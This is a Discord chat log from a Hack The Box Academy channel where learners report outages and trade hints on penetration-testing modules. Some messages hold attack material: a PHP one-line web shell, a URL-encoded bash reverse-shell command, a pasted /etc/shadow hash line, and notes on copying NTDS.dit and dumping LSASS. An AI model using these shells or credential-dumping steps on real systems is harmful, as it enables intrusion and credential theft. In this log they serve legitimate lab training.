#modules

?

https://academy.hackthebox.com/vpn

Stopped terminal on link remote

@oblique summit

yes, it's supposed to do that. open another terminal

?

is it truly out?

got the same problem... :/

getting the same issue too

slow af load times

heyy

same here

is anyone here , i want ask something

looks like there is a outage

ask

no one is here sorry we are just the NPCs directing you away from company resources

https://tenor.com/view/cats-gif-26316295

yeah even the ips are taking forever to load

Hello
Did anyone finish the Appsanity box?

Anyone able to nudge me with the Nmap module: Scripting Engine, having some trouble finding this flag.

is that the easy nmap one

im in but like its janky man sloooowwww load times

Just in case you were wondering i installed intel open cl and then it worked. From what i've seen its a problem with hashcat in a vm coupled with me using amd processor

Should be easy but not sure what I’m overlooking

Fax incredibly slow.

im trying to go to the course one sec

Dopamine.

im on footprint hard box and nothing will load

Are the academy servers down? I cant log in :c

yes and now

no*

is hack the box academy also really slow for u guys?

I cant even load the website so

My scans are slow ashit

yeeeah, I think they have some server issues again..

dude idk what you mean im running faster than forrest gump

-T1 vs -T5

WELL imma go distribute freedom on helldivers 2

For an explanation and resolution regarding evil-winrm, I saw this post (https://www.reddit.com/r/hackthebox/comments/1b6pmfq/evilwinrm_alternatives_follow_up/) on reddit yesterday.

@heavy edge no nudge :/?

i cant get to the dashboard it times out

imliterally stuck on the footprinting box screen

it may work!!!! is it the network enum with nmap module?

hello everyone i need ur help

i forgot how to start anyone help me please

wot

what are you stuck on

The NSE page of Nmap Module.

Module 19 section 108

yes okay so im guessing one of the ports is 80/443 for a webserver

so you need to look at the http scripts so fuzz it. you can either do --script http* or vuln iirc

I’ve ran it through like every category. But the flag that is showing to ME is the previous page’s flag

Http-*?

have you tried going to some oe the webpages it lists

ahhhh okkaaaay

i see what i did

just talk to the robots and curl an idea in your head to get the flag @onyx sonnet

also try and enum http via nmap to find the directory

We all agree that acad website is full of 504 ?

dont you mean 502

I've both xd

oh damn

They’re speaking to me

the correct way is http* which runs every http nmap script

the robots?

so you found it

The robots have spoken and I’ve listened

gud

They told me 01010100 01101000 01100001 01101110 01101011 00100000 01111001 01101111 01110101 00100000 01000101 01111000 01100101 01100011 01110000 01100001 01101110 01100100 01100001

yeah one of the places you always check is robots. this disallows for the subdir to show up on search engines and such

you can find alot of neat stuff

wait you found it or nah

i cant tell if you are srs

Convert binary to text nerd

oh i hate binary. network+ tiltled me in the binary section

so i just avoid botspeak

academy is dead.

Tis’ the language of the machines you must become fluent. I did find it.

no u

good lol glad i could help

L bozo

youll love footprinting module. hacking imap is interesting

same with oracle

and smtp

no u

Hey guys. I have a question regarding SOC path in HTB. i am confused about the target IP. Any help?

time to dispense freedom

Is academy website currently down

I just got the same message when logging in.

Check my profile links, I also indulge in freedom dispensing

yes it is down

Great, the one day I actually plan on doing work lol

please sight tight hack your VMs and eat a burger

https://tenor.com/view/viralhog-gun-fire-murica-flag-america-gif-12183553

502 issues Ray I’d: 85fafb74193c869b

Wonder if someone unplugged something in the data center to make space for their space heater. New person, intern, etc...

nah they unplugged the server to plug in the microwave duh

Oh man!! And if they cook fish. Off with their heads!!

Priorities, so important 🤪

Academy is down....once again.

if i cant eat my bean machine burrito deluxe, what use am i ?

https://tenor.com/view/microwave-amazed-stunned-cooking-dumbfounded-gif-14084774

Maybe it's a blessing in disguise. I've spending all my days in front of the screen.

Time to touch some grass.

nah its time to helldive

Oo wait, wonder if it's a cloudflare issue. Just saw a random error popup and then disappear to the HTB we are working on it issue.

yes same with me

It s me or Academy is down rn ?

its you

We are all a little down

here too ( EU )

Here too (Chernobyl)

That why we are here oc

its just u

😭 😭

Working again for me

Y’all should touch grass at this point

Kid named 'grass': 😳

Valheim give me enough contact with nature don t worry

Touché

https://tenor.com/view/grass-mowing-grass-cutting-gif-26074155

You’re def not in that town

WANNA BET

Came here to post this lol

It’s an active war zone lol

My friend Anatoly would like to disagree

But he can't. He's taking a rather long nap.

lol

ITS UP

That’s what she said

ACADEMY IS UP

It's been up since a long time

nah

Ah, I thought you meant the power plant

just got up, its been down

The city is taken over by Russia

but now its up

Well I'm happy for you brother

It’s an active war zone

hi! is cadamey website down?

i am not able to log in

Join the club

Error 504

haha

Out here in Chernobyl, there are no oppressors.

Only protons.

yeah okay thanks

just got up

that was my question

lets goooo

its up now

what could happened? 😄

It’s up!

yeah its up for me as well

Yeah it’s back

:hero by nickel back plays in the background :

Yep same here. Back up. Took a minute with the loading screen. Akin to the hot busy bartender yelling get to you in a second 😂

I'm in the Live Engagement for Shells & Payloads and the machine i RDP to don't have a browser. Can anyone nudge me in the right direction?

Yemen threw grenades at all the underwater internet cables

firefox in the terminal

I think i remember that one.

Try downloading a mini portable browser for Windows on to the host, and use it to access whatever site you want.

Or, you could proxy your connection, and access the site from your attackbox. Look into 'rdp2tcp', use that to start a SOCKS5 proxy, and route your browser's traffic through that.

Interesting. Thanks!

Yeah true, I'm, not great with proxies yet. But I'll give it a shot if nothing works. Thanks!

There's modules about Pivoting. Go through them.

Once you get a bird's eye view about the whole thing, it'll be second nature to you

Good luck!

That's a module im looking forward to!

the target to rdp into is a linux host, how would transferring a browser for windows help?

Ah, then it's not the one I remember.

I did a module weeks ago which involves accessing a site, but there were no browsers on the system. It was a windows box.

On that, what I did was transfer a portable browser, very small.

I used that.

I can't remember any modules that needs a browers but the target doesn't have one installed

This might be a stupid question. But what does it exactly want from me? I can see that it want's me to list a protocol. Is that normal? It kinda feels a bit out of scope from the content I've been doing this module :p

I could tell you, but i forgor

Firefox http://YADA-YADA

You missed the protocol - http

Yeah, I'm a bit tired xd

Thanks!

Aren't we all?

I got a question

How do y'all have these Discord roles in your profiles? (Like "HackTheBox - VIP" and stuff?

On the Linux Priv Escalation module. Has anyone ever figured out how to get into the target without using the HTB provided creds? I've already got all the flags it's just bugging me. DM if needed as to not provide spoilers.

Hi

Why I can’t see anything like general chat ?

Have you tried opening your eyes?

Funny guy

Shut the fuck up.

I'm just practising my Customer care skills

t0xic

twas a joke jfc

Hey bunny

Here is the general chat #general

Hi Bread

Thank you

for some reason this doens't work. I'll try to reset and pray it works.

What's the error?

what error? and you just have to type firefox to open the browser

same as before

For some reason once I opened it , it worked but idk why it was not showing . Thank you

It gives me the exact same error as the first screenshot i sent

oops

did you rdp or ssh

Bread

rdp

Bread my brother wolf

https://tenor.com/view/karma-fırıncı-gif-3620333979843647474

Head over to general

Can you ping the internal web server?

I terminated ip and spawned it again and now it works

Ah

Just spent an hour on this issue. Thank god it works now xd

The age old "Turn it off and then turn it on again"

Thanks for the support @next bronze and @empty imp ❤️

Always works!

I wonder why the hospital staff were so mad at me when I did the same with a ventilator.

yeah so weird

hey how do you guys take notes

I use OneNote for Windows 10. I know a lot of people use Obisidian. But the nice thing about OneNote it syncs to all ur devices and is free and veeeery easy to use.

yes but i found everything important and typed almost all the module

if i will leave something then i think that i will forget it

how do i manage this

Cherrytree here

Well, I usually read one section and then take a few bullet notes of what i think was the most important points and then the commands I use for the test. But it really depends on you. I would recommend not taking too many notes, since it can get cluttered really easily.

Thank you very much

is it unstable for anyone else xfree is closng out and i have to keep resetting thr IPs

yes, me too, but is also unstable the connection to openvpn

use tcp vpn

yeah even just pinging and using onesixtyone im having issues

i'm trying to download again the file to connect to the vpn but i don't think will change the situation

Your notes will evolve over time. I use Obsidian and essentially paste the whole lesson into there and go back and take an abundance of notes and screenshots during the exercises, then go back and take the highlights from my notes on a new tool or methodology or useful command and add it to my own cheat sheet. Take more notes rather than less, then go back and clean it up to show your methodology and highlight your own mistakes to learn from them

do you mean to change proto udp to proto tcp?

yo

thankyou very much i will try this method

You can PM me if you want to see how I've done it

somonme teach me how to ahsck

ye

i did it, it can't establish connection,

are your creds correct? my rdp worked fine

i was talking about the vpn, in terminal is blocked to establish connection

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

in the web site they talk about an incident in the EU Academy Lab Controllers, but the state is resolved

contact support

https://academy.hackthebox.com/module/145/section/1346
im stuck on the server side attack skill assessment i found a file that had 3 strings base64 backwards i've combined them and now im trying to curl it and nothing

am i even on the right track?

Notion is good but its browser based so I wouldn't store any PII info and or Confidential in there.

notion is nice but I think one note is better

Yea its notes so personal preference is key.

it works now! I just downloaded again the ovpn file and run it under udp

I have a dumb but possibly legit question for you

i reallly tend to over think dude

medium and HARD module really makes me mad at myself

yes?

Is "are belong to us" in your bio a misspell or just something my brain is to smooth to understand?

heh

all your base..

ye

https://en.wikipedia.org/wiki/All_your_base_are_belong_to_us

Haha that makes since, I was thinking it was just something that proves my Autodidactic insufficiency.

nah just an old meme

Hey there, has anyone done the Hard footprinting lab? I'm really at a standstill on it.

Which part, impacket?

just finished it

no, it is a part of the footprinting module

wait the lab or the module

the lab is different from doing the modules

I've only gotten as far as scanning and seeing it is a pop3 imap server with ssh. I can establish connection with both imap or pop3 but no commands work, i'm not sure if I need to authenticate or if I need to look at some more specifics of the dovecot version or what.

try scanning the udp ports

-sU -F

see what comes up

alrighty, I'll give it a go.

thanks @heavy edge

yw

i'm on the File Upload Attacks module and been banging my head to find out the upload path of the image in the SKILL ASSESSMENT... plz help me with this one... urgent,...... 😭

ideally this takes info directly from nmap stuff. you wanna make sure you are scanning every corney you can so you can check it off

this was what I used for transparency : -sV -sC -v -p

also it may be -f lol i cant remember the "fast" scan setting

.

id just do -sV -sC -sU/sS and -f if you are doing udp. only -p if you are tegeting specific ports with nmap scripts

-sU/sS depending on tcp/udp

hello, is it possible to connect (RDP) to a windows host via windows?

the VM xfreerdp works but really slowly for me, I downloaded openvpn on my windows host machine and tried connecting to my target machine via remote desktop connection but it says logon attempt failed:

this is how it looks

I can ping the machine -

(in theory) there should be in difference right?

Try to restart it, sometimes I got this happen too

is it a domain cred? you might need to specify that

yeah its a user on a domain

domain\user

oh, one sec lemme try that aswell

oh it works! thank god I was going to skip all the windows RDP stuff because it was just killing me how slow it is, thanks so much

is windows rdp faster than xfreerdp?

not 100% sure, but since I'm running a VM into xfreerdp it might be eating my resources, I'll have to check though admittedly right now I'm getting a black screen

hit enter

hmm nope it's just stuck now, tried to log into it again and same thing

wish there was a way to do this via terminal so i can see some logs

Hey man your advice was very helpful, I have a new lead now! Thanks!

im gonna restart one more time and try it again and if it doesnt work i'll just do it via my vm

help me anyone plzz

welp, can't get it to work for some reason, if there are any other ideas please do tell

no idea about that one, never used win rdp for academy targets

freerdp exists for windows, maybe you can try that one

This password mutations lab is annoying. Hydra has been trying to crack this password for 45 mins

Hello ?
Any hints for Footprinting HARD ?
i'm into tom user ( ssh)

Have you checked the root folder?

07

i'm as tom user so i guess i can't access root folder

ls -al

yes i checked that and also logged in into mysql but didn't get anything from mysql

you are joking

do i have to dig more into mysql ?

I believe you're at the IMAP/PoP3 part of the lab

i'm not. i have this in front of me

you are actually logged into mysql?

i logged into tom with ssh

yes

Oh, then yes, sql.

DID YOU READ THE QUESTION

yeah but no hints 😦

||Reminder that you can get to mysql from inside the SSH session.||

i'm inside ssh buddy

hes literally in the mysql session

Oh if you’re already in MySQL just enumerate that

OK

is it normal that if i try to spawn a session with PSSession using Villain.py everything crashes?

Oh then...I dunno what else to tell him lol

i cant tell him anything w/o giving the answer

||S H O W D A T A B A S E S ;||

@fathom pendant

buddy that's the things i was asking like should i dig more into mysql or just skip it and check other stuffs
Thanks btw

but like

hello sir

why wouldnt you initially do that

if you have a msql server its juicy

Hello 😃

I’m gonna start with cwee path

tell me how it is

I should probably revise web attacks first

But whatever

lmaooo

i was considering doing the pntp but theyre raising the price 100 bucks

I might need to revise on my web stuff soon

I do not mind fighting you

😢

I’m gonna start oswe soon

I have some stuff coming that might need me to do web

sometimes

i need to get better at xss/sql/xsrf attacks

i have never ever understood them or how they work or why they work

I already am

Also need to do crte in the upcoming months

Blegh

mr htb god i see

Well partly am, I’m not doing any HTB certs any time soon

do peopel actually hire those with htb certs?

i know offsec and comptia are big and sometimes gsec, cometimes i see cppt/ejpt etc but curious about htb certs

Not well known, so pretty much no

Hey does anyone knw how to solve this question

In linux pass the hash

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I check the tem directory to copy cache file but not working

Is there student pricing for hackthebox or only for academy?

it's only for academy

Great thank you

i still need help on the server side attacks skill assessment :/

i think im getting it right and still nothing im so confused

I think they tried to patch something and broke another thing

i believe in u

That makes 1 of us

what?

I downloaded the top1million-5000 wordlist, but somehow when I open it in Linux it loads in halfway? When im searching the file I cant find certain words.

what are you opening it with

https://tenor.com/view/itcrowd-reboot-gif-4770974

Hi guys! If you unlock a module using the cubes from a monthly subscription, Do you still keep access to it after the subscription ends?

yep

yep , lifetime afaik

That's awesome! Thanks a bunch 💪

I've been going through the pw attacks hard lab and I'm stuck on

||decrypting and mounting the backup.vhd file inside pwnbox. I tried dislocker but don't really know what I'm doing. I cracked the hashes with bitlocker2john. Can someone point me in the right direction?||

Anyone else had issues grabbing Rev shells in File Upload Attacks module /upload exploitation? i'm using php pentesting shell trying with port 80, 1234, 4444, and the random port machine is hosted on. when i access the page the page hangs like its connecting but get a time out error after about 30 seconds. Getting similar results with msfvenom shell as well. however page resolves to */ after hanging instead of the time out page.

you could try to upload a more simple PHP shell like

<?php system($_GET['cmd']); ?>

then try a command like http://<url>/<file>?cmd=id

HOW CAN I HACK?

that works, but really trying to get it to work with rev shell (trying to focus around oscp requirements atm)

https://tenor.com/view/hacker-hackerman-kung-fury-gif-7953536

then just start a nc listener (seems that you use port 4444), so try with the command http://<url>/<file>?cmd=bash -c 'bash -i >%26 /dev/tcp/<your-ip>/<port> 0>%261'

where %26 is & urlencoded

do it with burp as a get req and urlencode it

any tips on decrypting and mounting a vhd inside pwnbox? put the details inside this spoiler

do not spoil too much please i want to do this exercise in a "few" mins too 😉

in the pass the ticket from linux section under password attacks i've obtained a hash for linux01 user do i crack the hash using rockyou.txt or the password.list or the mut_password.list that is made with hashcat ?

I did it with Windows if I remember. Passed the file to a Virtual Machine with Windows and made everything there

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@livid knoll

that would be working smarter not harder lol.

wasn't sure if this was something that could be done inside pwn. can I PM you if I run into an issue?

Can anyone point me in the direction of making a ticket?

sometimes you have to work smarter than harder D:

TNX

iirc it's a lot of work, way easier to just use a windows vm

like a support ticket or a kerberos ticket?

lmao support ticket***** please no kerberos for the time being

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Legend, Thanks.

anyone around that can help a poor soul with the last question on the final assessment of ADCS?

very hard to learn

what are you stuck on?

VIM

Nano is better

unbased and banned

who

you

gedit is life

This is wild....

nano>>>>>>>>>>>>>>>

Instant friend request

skill issue

:wq

getting to the DC. found jimmies password, I think i found the DC password(doesnt work). given it is a cert mod, i re ran certpy with jimmy and see anoter esc vuln, but idk who that user is

check what group jimmy is in and what perms he has

"username and password is incorrect"

All jokes 🙂

can anyone help me with the password attacks (pass the ticket in linux) section ? i found the linux01 hash but couldn't do anything with it

is nano really real ?

how does that change what I meant

idk anything

because and is not or but i think you should show us the values of $damundsenPassword and $Cred instead

I'm saying that the credentials given is wrong, hence the error

it was a exam and pc disktop

doesn't matter if it's and or if or else or whatever, the error suggests than the creds are wrong

very easy

for u but me no

if I can do it anyone can 😁

Is not FindByIdentity a credential verification

^

dm if u want

why

nvm i know it

it boils down to you have incorrect creds

otherwise it wouldn't spit out the a or b response

if your initial question was regarding mounting the b*.vhd from a skill assessment: there's a guide if you use discord's search feature

I really don't know why you're replying like you're sure that isn't the error and trying to correct me, but I'll entertain you, FindByIdentity is called by Set-DomainUserPassword in powerview
https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1#L5537

Hello can you help me please ?

you're trying set a password isn't it? to set a password you'll need a user with sufficient rights, so valid creds will need to be applied

^

the section goes over it actually fairly well

you likely misread a step; or skipped one and didn't realize

however if you're using the ForceChangeUserPassword you don't need the OG password; just your password

as in the password of the account you're leveraging the account with

Where is my message???

Hey I'm currently working with medusa. I have multiple user name and a password list.

I want to run a thread per user example first thread takes a user1 and the password list and the second thread takes user2 and password list etc...

I've added -L tag but it didn't parallelize for multiple logins but testing one by one

Somebody have the same issue with the connection? I cannot ping the academy box in the Windows Privilege Escalation Skills Assessment - Part I from the pwnbox or from my own machine with the VPN.

hi, i have a problem with the SIEM & SOC fundamentals : SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe).

Here is the question : "Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X".

When I enter 2023-03-06 I get the wrong answer and I don't know what the right answer is other than that...

can anyone help me please ?

Man, how am I supposed to do any of the RDP labs when the entire spawned server crashes just from me trying to open cmd.exe on the remote desktop

is this error expected?

I'm not sure what you're doing exactly but keep in mind that the CA is not on DC

is that from the ADCS module? i remember that error, it was because i was doing something wrong

sounds suspiciously like what would happen to me when I had accidentally open multiple vpn/pwnbox sessions

It might actually be the vpn. I've noticed that even if I don't connect via RDP and just let the server sit, after maybe 5 mins I can't ping it anymore and have to reinitialize the vpn

did you make sure to kill all your vpn instances first?

I only have the one running

This sounds exactly what symptoms you get if you have another instance accidentally running

sometimes they don't all die properly;
sudo killall openvpn is a good way to make sure they all are stopped

Not to be rude but I didnt ask if you only have one instance, I asked if you checked. Subtle difference

I believe you think you only have one instance, but did you confirm it

^

Happened to me on my Oscp exam even

sometimes it literally can be dumb and somehow run 2; or it can silently fail and initialize twice

What's the command to see all open vpn instances? I'm not seeing it on the --help

ps -aux | grep 'openvpn'

you don't need the -

or just reboot

ah right

get skill issued (meanwhile hasn't completed the AD module after months and doing it like every other week)

Yeah just the one instance, but crossing my fingers because this one is persisting longer than before after a modem reboot. Probably disconnected any other instances if there were any.

extra dash, sent to the shadow realm

minor spelling mistake; the payload instead sends all your browsing data to the NSA

https://tenor.com/view/minor-spelling-mistake-gif-21179057

switch the vpn server, download the file again, reboot, delete the old .ovpn file, connect again

tbh though it's genuinely funny (i've done it too) where the reason something failed is because a single spelling mistake

@loud prawn

reboot isnt a guarantee, thats exactly what happened for my oscp mishap

comon

the openvpn process resumed in the bg even though I couldnt see it in my term. So I started a new one and it fucked things

Even after you killed it?

skill issue ig

i lov you marcielee

Nah once I manually killed I was all good

always good opinion

no way it's the only troubleshooting step you need

https://tenor.com/view/im-sorry-do-i-know-you-christina-applegate-jen-harding-dead-to-me-gif-17811424

I professionally work in repair and can tell you that's a lie

https://tenor.com/view/caet-salute-yes-ma'am-yes-sir-affirmative-gif-15398447149258938912

yes

reboot didn't work - my computer is now speaking in tongues, please advise

seen it

we talked other day about cpts and i will tell my friend at htb to mod you

for great service and contribute to community

Customer had factory reset their mac, the voice was the setup assistant

this is me rn when i see you macie

dont be weird

its not

can you fucking not?

also embed fail

open it

its not weird lol

nah i'm good

ur loss .-.

<@&861185840277487616> person is being fucking weird

i'm sure i'll recover

xd

Don't be gross.

LMAOOOOOO

macie i garrenty u they setting me up

if i may, i can dm it to you to counter their vain attempt

they just jalous

Keep this channel clear of nonsense that isn't related to module content

great wich channel do i go

make new one for general chat

brb

#rules , then verify in #bot-commands

Youve been in the server for 5 years and never figured out how to verify your account

Then you'll be able to see general chat

https://tenor.com/view/austin-powers-dr-evil-how-gif-19601238

T-T

Working on File upload Attacks (blacklist Filters), i found a some extensions that bypass the filter, and when navigate to them i can see it was successful in the source code but any commands result in blank white page. Any idea what im doing incorrectly?

That just means that despite bypassing the blacklist filter this extension isn't able to execute the PHP code, as you can see by the output all you see is the raw PHP web shell code. So keep trying different extensions until you find the one that can bypass the blacklist and also execute PHP code

Yes, of course 🙂 There is only one tool mentioned in the module. I have discovered already subdomains including subdomain of subdomain of inlanefreight.htb but still no luck in finding the one ending with 'x.x.x.203'. Any hints? There are many files in the SecLists, I already tried a few.

you gotta be fierce with it

wot teh fook

hey i am new here where can i find the section related to people working on zephyr right now :<

(or just talking about it)

Ooooh.................................................this was sooooo hidden...cannot believe this!!! Finally got it! Solution=subdomains+another_wordlist

Just for the attention of the Footprinting - DNS module writer: there are 18 (!) different wordlist files in among the SecLists.

Thanks very much, I figured out with a hint from someone. I did not know that a subdomain can be further bruteforced with the tool. I really appreciate it. TIL!

In short: why wouldn't it

I mean common convention is start small

https://academy.hackthebox.com/module/51/section/478
In this section I don't understand why they used cp command to move shell to /mnt directory when the directory already has the file and where are they trying to move it from?
htb@NIX02:/tmp$ gcc shell.c -o shell

root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell```

I don't see where it's showing shell is already there

I see you're mounting tmp to the device

Then moving shell directly to the mnt location

you see in the NIX02's tmp directory is where we compiled the shell binary and then mounted it onto pwnbox

Yes

You're literally mounting the shell from the target to your device

Module:NTLM Relay Attacks
Question Skills Assessment:Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
Hi can anyone give a hint im stuck here (edited)

yes. then why are they trying to move the shell from my device to target machine. It doesn't make any sense because I don't have shell in my device it's already on the target

You're setting the sticky bit

I.e. making it always run as root

So when you go back to the target and run it: you become root

use the domain cred you got from the first question to enumerate what can be used

I get that part. But my question is when we mounted the /tmp to /mnt all the files in the tmp supposed to show up in /mnt. Then what is the purpose of copying to /mnt again. It's like copying the file again into same directory

It's so you can have write permissions, likely

MODULE: HTTP ATTACKS
SECTION: HTTP Response Splitting

Could I get a nudge on payload formatting for interacting with the Admin user? I'm a little confused as to what page the notional admin is checking for triggering the payload.

probably. But it still not working even if I do cp or not

hello, if I pay gold annual, how that works? can I access Modern Web attack module?

yeah anything tier 3 and below

Thanks, is that tier 3 max? or htb has tier 4?

yeah but only a few

you also do still earn the cubes from completing modules

20% for all tiers except 0; which is 100%

I know I have it right, but I'm told it's wrong, there must be something about the format of the answer I'm giving it, is there anyone that can help on that?

For example, I've tried 192.168.0.255 for a network

and 192.168.0.1 for broadcast

Sorry, I meant it the other way around

What am I supposed to be putting in the \?\GLOBALROOT\ part of this command? "cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"

well it depends on the question

for example in a 10.x.x.x network, a 192.168.x.x address wouldn't be apllicable for it's addresses

So it wants the IP of the box I've compromised?

i wasn't responding to you

Oh, whoops

also: use backticks

because if you have any \\ discord formats them

You will need to provide more information. For example, what is the subnet mask?

Yeah, I realize that now

I believe the section explains it

This is all it says. Then it starts talking about using CME as an alternative

yes

you can literally use that exact syntax

you don't need to replace \\?\GLOBALROOT\ with anything; it's a filepath itself

Right behind you bro starting the skill assessment soon damn thought I was finally about to catch up too 🤣

\\?\GLOBALROOT refers to the disk itself's file root, not the windows C:\ root

i was stuck a few dys on the last 2 modules

File Inclusion skill assessment definitely had me stumped for longer than I expected

hehe me too

I'm hoping File Upload assessment won't take too long

we will see 😉

tomorrow i can play in a hardened AD

I must've just messed up somewhere then.

at work 🙂

I assumed I had to change the path somehow

It's a /27

255.255.255.224

Cool. Then your answer was indeed wrong.

Does the directory NTDS exist?

btw use NXC instead of CME 😉

It never asked me to create it so I assumed it was there by default, but it's possible it doesn't

Try copying to temp

It took me like 20 mins of trying various methods before I could finally get CME working and I had to use poetry to do it. Least I can do is use it for a bit before switching to netexec lol

lol yes but netexec is way more stable and has more functions 🙂

Yeah, I'll have to give it a try

@buoyant void i did have a layer 8 problem the last 2 days 😄

I'm missing something here. let's say it's the second network for 192.168.1.0/27, what would be the network and what would be the broadcast?

yes use pipx X and bam, works

What's the point of pipx? Is it just an advanced version of pip/pip3?

it works

Network: 192.168.1.0, Broadcast: 192.168.1.31

and they recommend it , so i use it

That's the first subnet?

just use a subnet calc 🙂

the Second one would be 192.168.1.32 for the network and 192.168.1.63 for the broadcast

and yes, I did use a subnet calc

Looks right.

its 32-27 ** 3

if i am correct

RIght

So I'm not sure why it's not taking the answer I"m giving.

you should provide the full question: Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.

ok that soundws different

without knowing the question we wouldn't know it needs to be split into 4

which module is that ?

Intro to networking

into to networking - subnetting

maybe i should take a look after hehe

I didn't even know there was a networking/subnetting module, I'm going to have to check that out

I could use a refresher also... lol

I also said earlier: it depends on what the question is asking

Every time I take the time to learn about subnetting and networking it makes perfect sense, and then a few weeks pass and my brain just puts it all in the recycle bin

I get it.

And I agree I used to do this in my head, but haven't in years, anyway, I just figured it out.

did anyone take the bloodhound module ?

yeah I did

can you recommend it ?

BEFORE cpts

it's an alright module but compared to all the other tier 3 ad modules, it's probably the weakest imo

hm ok , later then 🙂

many did CBBH first,

nessescary ?

Not strictly

As the web stuff is likely just barely a blip/covered by the modules in the path anyways

Too much prep can cause you to overthink

thats true

i hope cpts is not soooooooooooo much web stuff , more AD

in linux fundamentals module: Find Files and Directories this command won't work for me "find / -type f -name *.conf -user root -size +25k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null"

what is the error msg ?

no error message it goes to the next line for new commands

then it did not find anything

interesting

2>/dev/null

Try it without the 2>/dev/null and you'll see the errors

But it didn't find anything

shows: "find: paths must precede expression: Templates' find: possible unquoted pattern after predicate -name'?"

time for troubleshooting then 🙂

like 60% of a pentesters life 😄

are you running the command in pwnbox or the target? did you ssh?

was literally about to suggest this

it sounds like a common layer 8 issue with this module

ok 2 am .... good night 🙂

This is a dumb question but I keep meaning to ask it and forgetting, when I get something like this ||root:$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.:19032:0:99999:7:::|| from a /etc/shadow, which part of that is the actual password hash?

I thought SHA-512 starts with $6$ but I just can't parse the sections

you can throw the whole thing at hashcat i believe

it's built in a way to parse it so you don't have to

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

also delete that as it's literally a hash of an account you gotta crack

that explains it all

even though you put it in "spoilers" it really doesn't do much

I know, but it's the answer to one of the lab questions so I thought that would be the right way to do it

Yes it can be cracked with the right password

The password attacks module has you create a mutated list: try that first

hashcat just tells me that no hash-mode matches the structure of that lol

then specify the hash mode

it's not that difficult to do that

you specify hashcat mode with -m

Maybe I should do the hashcat module sooner rather than wait for it to pop up in queue

literally the module gives you the syntax as well

if you don't use -m it assumes the first argument is the filename of the hash file

therefore it's trying to autodetect 1800 as a hash

Gotcha

instead of the mode you're trying to use

that's why it's giving you the error "No hash-mode..." because there is no hash mode that would output a 4 digit number

I missed the unshadow step too so that would've helped.

unshadow is how you normally would have gotten the hash

¯_(ツ)_/¯

hi

Web Service & API attacks, I still can't find this dumb parameter. Information Disclosure (with a twist of SQLi) is the specific part of the module, i'm using the wordlist mentioned in the module but it never shows the other parameter that can be exploited with sqli. i tried another wordlist that was about double the size of the one suggested, but that didn't find anything either. can someone tell me the wordlist to use or give me a hint if i'm just totally off here?

I spent over an hour troubleshooting a stupid question that turns out I was getting right the entire time and I just needed to reset the target I really need to start resetting the target sooner

ahh it's not another param that's vulnerable, i see

still not sure why my payload didn't work, sqlmap worked but that's not the intended way. idk why they threw this random sqli thing in a module that has nothing to do with sql and doesn't teach it

i see why it didn't work, i was doing '1 or 1=1; --, instead of just 1 or 1=1; --

simple syntax slip-ups screw you

@hallow remnant You can DM, if you're still stuck on the HTTP Response Splitting Section.

eee how to do this? i checked the time and event id but process name was different

it would be better if they just give the event log file

thanks for the help so far! funny i'd thought this discord would be flooded and it'd be impossible to get help.

A logon took place at that time, so check for something that you can tie to that logon

Free platforms for bug hunting practice anybody please tell me ??

Bug crowd, hackerone

Was having an issue with the Skills Assessment - File Upload Attacks module. I found the path to the files, and the format of the filenames via base64 decoding - but even totally normal pictures I uploaded were 404ing.

As I was typing this request for help, I tried to put in tomorrow's date instead of my own on a whim and surprise, it worked. Guess there's some timezone shenanigans going on

Been struggling with this for a while.

the servers are technically hosted in EU; so you do have to bear in mind that difference

So I've learned 😓

Module: INTRO TO WHITEBOX PENTESTING, Section: Skills Assessment, Question: The attached archive contains a basic script that may be vulnerable. Try to identify as many vulnerabilities as you can and patch them. Then, visit /patch and paste the patched script to get the flag, or to know what you have missed.. After I patched the code correctly I got the prompt "code injection should not be possible, even without sanitization or validation". I understand that I should have blocked code injection, but I don't know why there is no flag feedback.

Probably because you need to patch it more?

can I dm you

I haven’t done it yet

lol

why are you pinging random mods?

idk if that was one of them, or you being a pussy and not owning up to it

btw there's chat logs, they know

i have the hash but no creds

in many cases with windows; Hashes are as good as passwords

i know i have tried to pass the hash but no luck

hey
I think the module >
abusing http misconfiguration > identifying unkeyed parameters
have some problem
I tried both ways
first steal admin cookie
and second steal the response of the /admin.php?reveal_flag=1
but did not get the response to my server

relay it to dc, maybe use the || ldap || protocol

I got a question regarding Attacking LSASS.

we can dump shares with CMD by making it powershell and giving administrator privilage. then what's the benefit of it? Is this thing i useful in AD pivoting?

yes

some accounts might have mismanaged privileges across the domain

I.E. SEImpersonatePrivilege OR ForceChangeUserPassword or something along those lines

(or GenericWrite)

any user that's currently logged in will have their credentials stored in lsass memory, for example a domain user. it also stores kerberos tickets

so it uses only to gain DC admin creds, right?

no, the technique works on any hosts and what you get depends on what's on the system

okay get it. but basically to get different user creds, right? because we can dump lsass (at least when we don't hae GUI) only with Administrator privileges

i am sorry to give trouble about this but i am really confused with it. I tried GPT to understand concept but couldn't understand fully that's why jump over here

yes correct

okay great, thanks @next bronze & @fathom pendant

is hklm\system needed for hklm\security?
it was not explained in the module but also think that ntds.dit requires the hklm\system. thanks

hklm\security is useful when target is connected to domain.

but as per my understanding, both are not dependent on each other

yep, the bootkey in system is needed to decrypt the hives

